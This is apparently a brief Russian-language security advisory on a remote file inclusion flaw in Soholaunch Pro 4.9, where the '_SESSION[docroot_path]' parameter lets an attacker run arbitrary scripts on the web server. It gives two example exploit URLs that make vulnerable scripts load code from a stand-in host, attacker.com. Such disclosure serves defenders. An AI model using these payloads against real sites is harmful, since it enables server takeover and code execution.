• Партнер

  • Программа: Soholaunch Pro 4.9

    Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «_SESSION[docroot_path]» различными сценариями. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.

    Примеры:

    http://target.com/sohoadmin/program/includes/shared_functions.php ?_SESSION[docroot_path]=http://attacker.com/inject.txt?
    http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping _css.inc.php?_SESSION[docroot_path]= http://attacker.com/inject.txt?
     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии